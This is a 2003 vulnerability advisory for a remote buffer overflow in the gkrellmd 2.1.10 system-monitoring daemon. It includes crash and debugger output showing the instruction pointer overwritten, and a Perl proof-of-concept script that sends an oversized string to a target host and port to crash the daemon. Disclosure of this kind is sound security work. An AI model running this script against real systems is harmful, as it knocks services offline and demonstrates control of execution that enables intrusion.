Gkrellmd 2.1.10 remote exploit (buffer overflow)
date: 22-06-2003
author: dodo [dodo@darkwired.ath.cx]
aurhor-url: https://darkwired.ath.cx/

- Description:
Gkrellm is a GTK system monitoring utility, the latest version comes with a daemon.
It's a great peace of software, however the daemon needs more secure code.
gkrellm/gkrellmd: http://www.gkrellm.net/

- Exploitation:
when someone sends data to the gkrellmd, gkrellmd uses buffers to store
this data, however, it doesn't check for the maximum buffersize (128bytes).
This could result in remote executing of code and crashing the daemon.

- Details:

verbose gkrellmd output:

	cyride-bash# gkrellmd -P 661 -V
	update_HZ=3
	connect string from client: gkrellm 2.1.10
	gkrellmd accepted client: dwop.darkwired.da.ru:43755
	received 141 bytes: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
	Segmentation fault (core dumped)

debugger output (eip):

	cyride-bash# gdb gkrellmd gkrellmd.core
	(gdb) info reg
	eip            0x41414141       0x41414141

	
- Proof of concept:

gkrellmcrash.pl:

	#!/usr/bin/perl -s
	use IO::Socket;
	#
	# proof of concept code
	# tested: grkellmd 2.1.10
	#



		if(!$ARGV[0] || !$ARGV[1])
		{ print "usage: ./gkrellmcrash.pl <host> <port>\n"; exit(-1); }

	$host = $ARGV[0];
	$port = $ARGV[1];
	$exploitstring = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

	$socket = new IO::Socket::INET
	(
	Proto    => "tcp",
	PeerAddr => $host,
	PeerPort => $port,
	);

	die "unable to connect to $host:$port ($!)\n" unless $socket;

	print $socket "gkrellm 2.1.10\n"; #tell the daemon wich client we have
	sleep(1);
	print $socket $exploitstring;

	close($socket);
	
- Vendor Response:
vendor contacted on 22-06-2003
http://www.gkrellm.net/